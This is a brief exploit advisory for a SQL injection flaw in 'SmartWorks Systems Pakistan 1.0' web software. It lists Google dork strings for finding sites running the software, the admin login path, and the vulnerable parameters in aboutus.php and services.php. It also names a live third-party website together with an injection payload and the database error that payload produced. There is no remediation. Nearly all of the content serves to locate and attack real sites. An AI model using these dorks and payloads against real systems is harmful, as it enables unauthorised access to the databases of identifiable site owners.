SmartWorks Systems Pakistan version 1.0 suffers from a remote SQL injection vulnerability.
64ef687faa8c5b863dbf939ed550b247###########################################################################
# Exploit Title : SmartWorks Systems Pakistan 1.0 SQL Injection
# Author [ Discovered By ] : KingSkrupellos
# Date : 30/12/2018
# Vendor Homepage : smartworks.pk
# Tested On : Windows
# Exploit Risk : Medium
# Category : WebApps
# Version Information : Nginx 1.14.1 - jQuery 1.11.1 - jQuery UI 1.10.4
# CWE : CWE-89 [ Improper Neutralization of Special Elements
used in an SQL Command ('SQL Injection') ]
# CXSecurity Exploit Reference Link : cxsecurity.com/ascii/WLB-2018050284
###########################################################################
Packaging Printing A(c) 2012 Powered by SmartWorks Systems Pakistan SQL
Injection Vulnerability
###########################################################################
# Google Dork : intext:''Packaging Printing A(c) 2012. Powered by :
SmartWorks Systems.''
# Google Dork : intext:''Copyright 2018, All rights reserved, Designed by
Smartworks Systems''
# Admin Control Panel Login Path => /admin/login.php
# Exploit : /aboutus.php?id=[SQL Injection]
# Exploit : /services.php?content=services&sid=[SQL Injection]
###########################################################################
# Example Site =>
pakistanpackages.com/services.php?content=services&sid=75%27 =>
[ Proof of Concept for SQL Injection ] => archive.is/qlHcQ
# SQL/DB Error : You have an error in your SQL syntax; check the manual
that corresponds
to your MySQL server version for the right syntax to use near ''' at line 1
###########################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
###########################################################################